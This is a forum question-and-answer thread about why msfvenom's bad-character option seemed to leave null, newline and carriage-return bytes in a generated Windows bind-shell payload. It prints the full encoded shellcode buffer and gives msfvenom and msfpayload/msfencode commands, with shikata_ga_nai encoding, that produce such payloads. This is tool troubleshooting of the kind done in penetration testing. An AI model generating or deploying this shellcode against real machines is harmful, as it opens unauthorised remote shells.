When using msfvenom, I am under the assumption that the following syntax should give me shellcode without \x00 \x0a \x0d or \x40, because of the -b option

msfvenom -p windows/shell/bind_tcp -b '\x00\x0a\x0d\x40' -f python

However, every shellcode I get still has one of these characters in it... e.g.

buf =  ""
buf += "\xbd\xb8\x8c\x23\x17\xd9\xce\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x4a\x83\xc2\x04\x31\x6a\x11\x03\x6a\x11\xe2"
buf += "\x4d\x70\xcb\x91\xad\x89\x0c\xfe\x24\x6c\x3d\x2c\x52"
buf += "\xe4\x6c\xe0\x11\xa8\x9c\x8b\x77\x59\x16\xf9\x5f\x6e"
buf += "\x9f\xb4\xb9\x41\x20\x79\x05\x0d\xe2\x1b\xf9\x4c\x37"
buf += "\xfc\xc0\x9e\x4a\xfd\x05\xc2\xa5\xaf\xde\x88\x14\x40"
buf += "\x6b\xcc\xa4\xeb\x27\xc1\xac\x08\xfd\xe0\x9d\x9e\x8a"
buf += "\xba\x3d\x20\x5f\xb7\x77\x3a\xbc\xf4\xce\xb1\x76\x8e"
buf += "\xd0\x13\x47\x6f\xe3\x5b\x0b\x4e\xcb\x51\x52\x96\xec"
buf += "\x89\x21\xec\x0e\x37\x31\x37\x6c\xe3\xb4\xaa\xd6\x60"
buf += "\x6e\x0f\xe6\xa5\xe8\xc4\xe4\x02\x7f\x82\xe8\x95\xac"
buf += "\xb8\x15\x1d\x53\x6f\x9c\x65\x77\xab\xc4\x3e\x16\xea"
buf += "\xa0\x91\x27\xec\x0d\x4d\x8d\x66\xbf\x9a\xb8\x24\xa8"  # \x0d (highlighted in the post)
buf += "\x6f\x88\xd6\x28\xf8\x9b\xa5\x1a\xa7\x37\x22\x17\x20"
buf += "\x91\xb5\x58\x1b\x65\x29\xa7\xa4\x95\x63\x6c\xf0\xc5"
buf += "\x1b\x45\x79\x8e\xdb\x6a\xac\x00\x8c\xc4\x1f\xe0\x7c"  # \x00 (highlighted in the post)
buf += "\xa5\xcf\x88\x96\x2a\x2f\xa8\x98\xe0\x58\x19\xbc\x58"
buf += "\x0f\x5b\x42\x4e\x93\xd2\xa4\x1a\x3b\xb2\x7f\xb3\xf9"
buf += "\xe1\xb7\x24\x01\xc0\xeb\xfd\x95\x5d\xe2\x3a\x99\x5e"
buf += "\x20\x69\x36\xf7\xa3\xfa\x54\xcc\xd2\xfc\x70\x65\x82"
buf += "\x6b\x0e\xe7\xe1\x0a\x0f\x22\x93\xcc\x85\xc8\x32\x9a"  # \x0a (highlighted in the post)
buf += "\x31\xd2\x63\xec\x9d\x2d\x46\x66\x17\xbb\x29\x11\x58"
buf += "\x2b\xaa\xe1\x0e\x21\xaa\x89\xf6\x11\xf9\xac\xf8\x8c"
buf += "\x6d\x7d\x6d\x2e\xc4\xd1\x26\x46\xea\x0c\x00\xc9\x15"
buf += "\x7b\x90\x36\xc0\x42\x16\x4e\x66\xa7\xda"

Am I misunderstanding the -b option?

Jordan Hanna

1 Answer

Seems like msfvenom is having a problem. I can reproduce it at my end. Will report this to the concerned people. In the meantime, you can use the combination of the msfpayload and msfencode tools:

./msfpayload windows/shell/bind_tcp R | ./msfencode -e x86/shikata_ga_nai -c 3 -b '\x00\x0a\x0d\x40' -t python

Update: The problem was resolved in the commit here. Please don't use msfpayload and msfencode as these are going to be deprecated shortly.

void_in